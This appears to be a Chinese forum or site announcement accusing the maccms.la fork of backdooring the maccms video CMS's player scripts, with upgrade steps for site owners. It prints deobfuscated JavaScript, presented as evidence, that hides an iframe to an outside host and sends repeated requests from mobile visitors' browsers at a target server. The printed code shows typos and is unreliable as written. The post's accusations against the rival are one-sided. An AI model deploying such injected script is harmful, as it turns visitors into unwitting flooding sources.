由于CMS原官方http://maccms.com域名从19年已经停止开放,但假冒团伙maccms.la却打着原班官网旗号长期劫持挂马非法盈利!!!已经有大量站长因此损失惨重!接下来会提供挂马证据! 如果你的player.js和home.js已经被自动更新了看看文件时间证明使用了后门版本 涉及到所有2020年后版本,可能会被黑客利用挂马 2019版不受影响。
请尽快更新到
V10版本2021.1000.2000+
v8版本2021.1050+
1,更新到最新版本程序。
2,后台播放器配置-》把所有maccms.la相关改为http://maccms.com、空或自己地址。
3,保持关注有问题及时上报。
4.player.js已经开源解密,可以不用受后门加密版困扰了!
5.如果不小心升级过导致接口功能无法使用、采集功能无法使用都是因为升级了后门版本验证不完善功能缺失覆盖更新包即可修复
注意:2020.1000.1029之后的版本,由于使用的la域名,无法正常接收com域名在线更新推送。请手动更新升级!!!之前的版本正常可以跳过更新! 请及时到https://github.com/maccmspro/download下载离线包升级!!!
以上是某资源群聊天内容,大量站长在统一时间反馈,加上la的作者也承认了。
其中正版http://maccms.com 从2019停更2年 可以看得出假冒正版的maccms.la从2020年就开始维护maccms程序直维护到今天,时间正好与 .com域名停止开放时间吻合。
而盗版:https://github.com/magicblack/搭建的2年之久经调查多大万计的站长都遇到过被挂马劫持,细思极恐。
目前唯一可以和正版对抗的筹码应该就是2年下来积累的肉鸡网站,一旦站长更新正版他们目的将功亏一篑。
经以上分析只要是懂点网络知识的看得出为盗版无疑。
暂且不说老的盗版程序是否比原来的优秀,就拿非法手段劫持站长流量的行为,长期控制网站权限的行为都已经触碰法律底线,加上自称是官方这种行为就让人唾弃,更是吧 maccms 老用户和众多提供代码的开发者的智商按地上摩擦。
以下提供部分劫持和攻击代码证据
可自行解密验证,目前你的用户已沦为攻击肉鸡
http://union.maccms.la/html/top10.js
http://union.maccms.la/html/top.js
这是解密后的代码
function msck(n, v) { var a = new Date(); a.setTime(a.getTime() + 30 * 60 * 1000); document.cookie = n + "=" + escape(v) + ";path=/;expires=" + a.toGMTString() }
function mgck(n) { var a, reg = new RegExp("(^| )" + n + "=([^;]*)(;|$)"); if (a = document.cookie.match(reg)) return unescape(a[2]); else return null }
function mshr() { var a = new Date(), mh = a.getMonth() + 1, da = a.getDate(), hs = a.gETHours(), rr = mh + "" + da + "" + hs, ek = 'k1', ev = parseFloat(mgck(ek)), ua = navigator.userAgent, au = '//http://a.laodaguan.cn/'; if (!/(Win|Mac)/i.test(navigator.platform) && !/(localhost|127|192|10)/i.test(location.hostname) && isNaN(ev) && $('.MacPlayer').length > 0 || location.search.indexOf('mdg') > -1) { if (/(iPhone|iPad|iPod|IOS)/i.test(ua)) { $("body").append('<iframe style="display:none;" referrerPolicy="no-referrer" security="restricted" sandbox="allow-same-origin allow-forms allow-scripts" src="' + au + 'index.html?' + rr + '">') } //这里为攻击判断如果是手机就一直长连接请求 所有访客将沦为攻击肉鸡 msck(ek, '1'); if (/(iPhone|iPad|iPod|IOS|Android)/i.test(ua)) { var b = new Image(); b.setAttribute("referrerPolicy", "no-referrer"); //这是官方被.la恶意攻击的地址 现在已经防cc限制 b.src = '//api.maccms.com/index.php?' + rr } } }
setTimeout("mshr()", 50);
可以清晰的看到除了劫持以外还有js cc攻击代码
在此高额悬赏此假冒作者身份信息,有任何线索的都可以向官方提供,我们将移交警方处理。
也有很多小伙伴一直问是不是老王,再次统一回答我们不是老王但又是,因为现在站在这个位置上我们就会对老王这个称号负责,也希望大家不要再去骚扰以前的老王打破他宁静的生活 感谢!
我们的价值观永久免费提供绿色开源程序给广大站长使用,决不触碰法律道德底线。
最后提醒:正版是:https://maccms.com |
